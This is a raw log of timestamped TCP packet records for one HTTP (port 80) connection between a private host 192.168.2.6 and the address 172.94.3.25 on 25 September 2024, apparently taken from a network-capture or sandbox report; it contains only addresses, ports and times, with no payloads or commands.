Sep 25, 2024 16:04:01.738481998 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.738518953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.738521099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738531113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738543987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738555908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738564014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.738600016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.738748074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738763094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738769054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738800049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.739059925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739070892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739083052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739121914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.739147902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.739370108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739428043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739439011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739464045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.739511013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739522934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739535093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739547014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739547014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.739558935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.739566088 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.739595890 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.816262007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816287041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816298008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816430092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.816523075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816534996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816545010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816566944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.816574097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816585064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816596031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816598892 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.816606998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816632986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.816649914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.816916943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816941977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816961050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.816977978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.816994905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817003012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817008972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817033052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.817056894 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.817483902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817574024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817584991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817596912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817608118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817615032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.817620039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817631006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.817632914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.817657948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.858699083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.894588947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894603014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894615889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894658089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894716024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894721985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894742012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.894790888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.894916058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894927979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894963026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894968033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.894972086 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.895004988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.895234108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895251989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895262957 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895273924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895288944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.895292997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895311117 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.895356894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895368099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895379066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895394087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.895397902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895416021 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.895497084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895530939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.895576000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895586967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.895618916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.972450018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972470999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972481966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972493887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972507000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972569942 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.972624063 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.972728968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972767115 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.972783089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972793102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972826958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.972858906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972868919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972879887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972896099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972898006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972901106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972913027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.972915888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.972949028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.972995043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973016977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973027945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973027945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.973038912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973061085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.973234892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973244905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973257065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973268032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.973299026 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.973323107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973331928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973344088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973356962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973381042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.973403931 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.973582029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973603964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973613977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.973639011 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.015429974 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.016334057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.016350031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.016362906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.016681910 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.050705910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.050719023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.050729990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.050743103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.050797939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.050838947 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.050904989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.050936937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.050940037 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.050947905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.050978899 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.051012039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051059008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051069975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051093102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.051110029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051121950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051134109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051137924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.051162958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.051249981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051265955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051270962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051295042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.051398993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051419020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051429987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051429987 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.051474094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.051484108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051489115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051496029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.051518917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.060864925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.060947895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.061018944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.094130993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.094142914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.094155073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.094204903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.094255924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.131320000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.131345034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.131366968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.131377935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.131442070 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.131820917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.131839991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.131861925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.131885052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.132980108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.132989883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.133001089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.133013964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.133034945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.133057117 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.133668900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.133702993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.133708000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.133713961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.133744001 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.134248972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.134321928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.134331942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.134345055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.134356976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.134380102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.135593891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.135606050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.135617018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.135646105 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.136956930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.136996984 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.137001038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.137011051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.137022018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.137043953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.172378063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.172389030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.172399044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.172415972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.172435045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.172477961 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.182425976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.182461977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.182482004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.209920883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.209944963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.209956884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.209966898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.209980011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.209991932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.210000038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.210045099 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.210921049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.210932970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.210963964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.210972071 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.210973024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.211000919 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.211661100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.211672068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.211683989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.211707115 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.212306023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.212318897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.212332010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.212340117 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.212362051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.213392019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.213490963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.213500977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.213511944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.213524103 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.213541985 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.214962006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.214973927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.215009928 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.215042114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.215066910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.215099096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.250600100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.250612974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.250626087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.250669956 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.287844896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.287869930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.287882090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.287893057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.287897110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.287905931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.287926912 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.287966967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.289076090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.289089918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.289103031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.289125919 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.289546967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.289581060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.289638996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.289649010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.289659977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.289683104 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.290277958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.290288925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.290298939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.290313005 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.290333986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.291587114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.291673899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.291683912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.291696072 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.291707039 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.291742086 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.292957067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.292968988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.292982101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.293005943 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.328629017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.328641891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.328661919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.328671932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.328672886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.328697920 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.366620064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.366635084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.366647959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.366658926 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.366664886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.366687059 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.366712093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.366720915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.366746902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.366749048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.366780996 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.366792917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.366803885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.366838932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.367600918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.367626905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.367639065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.367660046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.368119001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.368128061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.368140936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.368155956 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.368160009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.368171930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:02.369774103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:02.369779110 CEST	80	49715	172.94.3.25	192.168.2.6
